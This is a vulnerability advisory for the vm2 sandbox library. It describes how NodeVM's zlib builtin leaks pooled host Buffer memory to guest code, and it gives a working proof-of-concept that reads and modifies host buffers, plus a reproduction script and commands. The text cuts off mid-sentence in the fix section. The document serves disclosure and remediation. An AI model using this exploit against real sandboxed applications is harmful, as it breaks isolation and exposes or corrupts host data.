Out-of-bounds read In vm2
Description
vm2: NodeVM zlib Buffers expose pooled host memory across the VM boundary ## Summary When an application explicitly exposes Node's zlib module through vm2's NodeVM builtin allowlist, an untrusted guest can obtain a pool-backed host Buffer from zlib.deflateSync, create a full-width view of its backing ArrayBuffer, read bytes outside the compressed result, and flip a byte in an unrelated host buffer. The pinned vm2 revision reproduces disclosure and host-memory modification, while a sandbox-local Buffer control remains exact-size and non-mutating. ## Technical Details NodeVM accepts require: { builtin: ['zlib'] }. The builtin resolver reaches addDefaultBuiltin in lib/builtin.js, where the host module is exposed through the generic readonly wrapper. zlib.deflateSync returns a Node Buffer; for a small result, that buffer can use Node's shared pool, whose .buffer is the complete pool rather than only the logical result slice. The guest can therefore call Buffer.from(result.buffer, 0, result.buffer.byteLength) and inspect or modify pooled bytes outside result. The relevant isolation invariant is that every Buffer crossing into the sandbox owns its complete backing store: byteOffset === 0 and buffer.byteLength === length. vm2's depoolBuffer implementation applies that rule to sandbox-facing Buffer factories, but the generic host-builtin return path does not apply it to the Buffer returned by zlib. The precondition is an embedder that deliberately allowlists zlib; applications that do not expose this builtin are not reached by this proof. ## PoV The guest operation below is the decisive operation. The expected marker is a numeric array in the guest, not a host Buffer; the host-side oracle snapshots complete retained buffers as plain arrays before and after the guest call. js const zlib = require('zlib'); const result = zlib.deflateSync(Buffer.from('hello')); const view = Buffer.from(result.buffer, 0, result.buffer.byteLength); const markerCodes = Object.freeze([86, 77, 50, 95, 90, 76, 73, 66, 95, 80, 79, 79, 76, 95, 83, 69, 67, 82, 69, 84, 95, 55, 98, 51, 49]); let markerHits = 0; let firstMarker = -1; for (let offset = 0; offset <= view.length - markerCodes.length; offset += 1) { let equal = true; for (let index = 0; index < markerCodes.length; index += 1) { if (view[offset + index] !== markerCodes[index]) { equal = false; break; } } if (equal) { markerHits += 1; if (firstMarker < 0) firstMarker = offset; } } if (firstMarker >= 0) view[firstMarker] ^= 0xff; module.exports = { route: { requireReturned: !!zlib && typeof zlib.deflateSync === 'function', deflateSyncReturnedBuffer: Buffer.isBuffer(result), returnedBufferShape: !!result && !!result.buffer, }, resultLength: result.length, resultBackingLength: result.buffer.byteLength, viewLength: view.length, fullBackingStoreView: view.byteOffset === 0 && view.length === result.buffer.byteLength && view.buffer.byteLength === result.buffer.byteLength, markerHits, firstMarker, }; ## PoC Install the tested package version with Node.js, save the complete reproduction below as zlib-buffer-isolation-test.js, and run both modes. The attack and control commands print the JSON shown after the code. sh npm install vm2@3.11.8 node zlib-buffer-isolation-test.js attack hello node zlib-buffer-isolation-test.js control js 'use strict'; const { NodeVM } = require('vm2'); const marker = 'VM2_ZLIB_POOL_SECRET_7b31'; const markerCodes = Object.freeze(Array.from(marker, (character) => character.charCodeAt(0))); const retained = []; for (let index = 0; index < 192; index += 1) { const buffer = Buffer.allocUnsafe(64); buffer.fill(0x41); const markerOffset = index % (buffer.length - markerCodes.length + 1); markerCodes.forEach((byte, byteIndex) => { buffer[markerOffset + byteIndex] = byte; }); retained.push({ buffer, markerOffset }); } const snapshot = () => retained.map(({ buffer }) => Array.from(buffer)); const changed = (before, after) => before.some((bytes, index) => bytes.some((byte, byteIndex) => byte !== after[index][byteIndex])); const mode = process.argv[2] || 'attack'; const input = process.argv[3] || 'hello'; const before = snapshot(); const vm = new NodeVM({ require: { builtin: ['zlib'] } }); if (mode === 'control') { const control = vm.run(` const zlib = require('zlib'); const result = zlib.deflateSync(Buffer.from('hello')); const local = Buffer.allocUnsafe(1); const view = Buffer.from(local.buffer, 0, local.buffer.byteLength); module.exports = { route: !!zlib && typeof zlib.deflateSync === 'function' && Buffer.isBuffer(result), exactSize: local.byteOffset === 0 && local.buffer.byteLength === local.length && view.byteOffset === 0 && view.length === local.length && view.buffer.byteLength === local.length, }; `, 'zlib-buffer-case-a.js'); const passed = control.route && control.exactSize && !changed(before, snapshot()); console.log(JSON.stringify({ mode, result: passed ? 'pass' : 'violation' })); } else { const attack = vm.run(` const zlib = require('zlib'); const result = zlib.deflateSync(${JSON.stringify(input)}); const view = Buffer.from(result.buffer, 0, result.buffer.byteLength); const markerCodes = ${JSON.stringify(Array.from(markerCodes))}; let firstMarker = -1; for (let offset = 0; offset <= view.length - markerCodes.length; offset += 1) { if (markerCodes.every((byte, byteIndex) => view[offset + byteIndex] === byte)) { firstMarker = offset; break; } } if (firstMarker >= 0) view[firstMarker] ^= 0xff; module.exports = { route: !!zlib && typeof zlib.deflateSync === 'function' && Buffer.isBuffer(result), fullView: view.byteOffset === 0 && view.length === result.buffer.byteLength && view.buffer.byteLength === result.buffer.byteLength, poolIsWider: result.buffer.byteLength > result.length, markerFound: firstMarker >= 0, }; `, 'zlib-buffer-case-b.js'); const passed = attack.route && attack.fullView && attack.poolIsWider && attack.markerFound && changed(before, snapshot()); console.log(JSON.stringify({ mode, result: passed ? 'violation' : 'pass' })); } json {"mode":"attack","result":"violation"} {"mode":"control","result":"pass"} The attack output requires the full backing-store view, a backing store larger than the logical compressed result, a readable marker, and an independently observed change to a retained host buffer. The control requires exact-size sandbox ownership and no retained-buffer change. The demonstration is limited to disclosure and host-memory modification; it does not demonstrate host code execution. The reproduction is tested against vm2 revision 91034466bfb7f56b95fd48083ec6ca36d058f164; package metadata at that revision identifies vm2 3.11.8. ## Impact An affected host application can expose sensitive bytes held in neighboring pooled buffers to untrusted guest code and can have those host buffers corrupted. This crosses the vm2 isolation boundary and compromises confidentiality and integrity for applications that allowlist zlib. The demonstrated host-memory disclosure maps to CWE-200, the demonstrated write to unrelated host memory maps to CWE-787, and together those confidentiality and integrity effects support a high severity rating. The issue does not reach applications that do not expose the builtin, and this report makes no claim about versions beyond the tested revision; the proof does not demonstrate host code execution. ## Suggested Fix Before any host-builtin return value is exposed to the guest, apply depoolBuffer or an equivalent owned-copy wrapper to every returned Buffer. The delivered buffer should satisfy byteOffset === 0 and
Mitigation
Update Impact
Minimal update. May introduce new vulnerabilities or breaking changes.
Ecosystem | Component | Affected version | Patched versions |
|---|---|---|---|
npm | 3.12.2 |
Aliases
References